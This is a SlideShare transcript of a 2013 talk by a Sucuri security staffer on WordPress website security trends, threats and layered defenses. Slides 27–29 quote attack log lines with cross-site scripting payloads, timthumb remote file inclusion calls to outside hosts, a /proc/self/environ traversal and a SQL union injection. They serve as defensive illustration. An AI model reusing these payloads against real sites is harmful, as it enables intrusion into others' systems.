Your SlideShare is downloading. ×
WordPress Website Security - Trends, Threats, Defenses
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

WordPress Website Security - Trends, Threats, Defenses

10,226
views

Published on


0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
10,226
On Slideshare
0
From Embeds
0
Number of Embeds
16
Actions
Shares
0
Downloads
28
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. WordPress Website Security
  • 2.  Expertise:  None  Specialization:  Website Security  Incident Handling  Log Analysis  Special Interests:  Warfare  Weapons  Martial Arts4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 2
  • 3.  Website Security Company Global Operations All Website Platforms Scan 1M Unique Domains a Month Block 1M web attacks a Month 300 – 500 websites a day Signature / Heuristic Based 24/5 - 18/2 operations4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 3
  • 4.  Trends Threats Defenses SIMPLE RIGHT?4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 4
  • 5. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 5
  • 6. 2011 2012 Malicious Links4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 6
  • 7. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 7
  • 8. Known Malware Unkown Malware4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 8
  • 9. Not Infected Infected4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 9
  • 10. 26% 19% 16% 14% 11% 10% 4%Remote iFrame Remote SPAM Obfuscated / Conditional Defacements Other Includes JavaScript Injections Encoded Redirects Includes JavaScript 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 10
  • 11.  Going Deeper than the application layer, targeting the server. Server Polymorphism – a.k.a changes a lot Email Apache SSH Server4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 11
  • 12.  Stick With Reputable Sources  Gravity Forms  JetPack Forms  Generating SPAM emails, resource hogs  IP blacklisting4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 12
  • 13. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 13
  • 14.  Pharmacy Payday Loans4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 14
  • 15.  Access – so easy, yet so weak  Widgets too…4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 15
  • 16. Site 4 Site 1 Site 3 Site 24/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 16
  • 17. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 17
  • 18. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 18
  • 19. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 19
  • 20. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 20
  • 21. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 21
  • 22.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole Exploit Kit – Today’s market leader  2013 – SophoLabs4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 22
  • 23. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 23
  • 24. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 24
  • 25. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 25
  • 26.  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 26
  • 27.  Stored  Reflective38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 5.1; Trident/4.0)"123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3EHTTP/1.1" 404 268 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 27
  • 28. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.phpHTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET/results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U;Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 28
  • 29. 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 29
  • 30. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 30
  • 31. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 31
  • 32.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 32
  • 33. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 33
  • 34. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 34
  • 35.  Access Control  Vulnerabilities  Hosting  Online Habits  Social Media  Passwords4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 35
  • 36. “It’s about risk reduction… risk will never be zero…”4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 36
  • 37.  We run on WordPress  Current Version of course  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 37
  • 38.  Instead of telling you what you need to do, I’ll just tell you what we do;  Our philosophy and approach is very simple, complex things break in complex ways;  We focus on the areas that we can immediately control;  We believe in layered defenses;4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 38
  • 39. IP Whitelisting Two Factor Authentication Strong / Unique Password Web Application Firewall Log Everything 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 39
  • 40. Stay Current Use Trusted Sources Avoid Soup Kitchen Servers Web Application Firewall Log Everything4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 40
  • 41. IP Whitelisting Server Isolation Public Key Authentication Host Intrusion Detection System (HIDS) Log Everything 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 41
  • 42. Category Tool TypePrevention – Software Vulnerabilities Sucuri CloudProxy ServicePrevention – Access Control Sucuri CloudProxy ServiceDetection Sucuri Monitoring ServiceRemediation Sucuri ServicePassword Management 1Password / LastPass ApplicationHost-based Intrusion Detection System OSSEC ApplicationAccess Control Enforcement Login Secure Solutions PluginTwo-Factor Authentication Google Authenticator PluginApplication Auditing Sucuri Premium PluginBackups VaultPress Plugin4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 42
  • 43. Category Location Type Disable Theme / Plugin wp-config.php Preventive measure Editor Disable PHP execution .htacces – uploads / images Preventive measure / wp-includes / etc.. Permissions Directories 755 / Files 644 Preventive measure4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 43
  • 44. Name ToolSucuri Blog http://blog.sucuri.netSucuri TV http://sucuri.tvWordPress Forum – Hacked http://wordpress.org/tags/hackedWordPress Forum – Malware http://wordpress.org/tags/malwareBadware Busters https://badwarebusters.orgPerishable Press http://perishablepress.com/category/web-design/security/Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sitesWordPress.org Hardening http://codex.wordpress.org/Hardening_WordPressGoogle Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpressExploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 44
  • 45. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 45
  • 46. 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA 46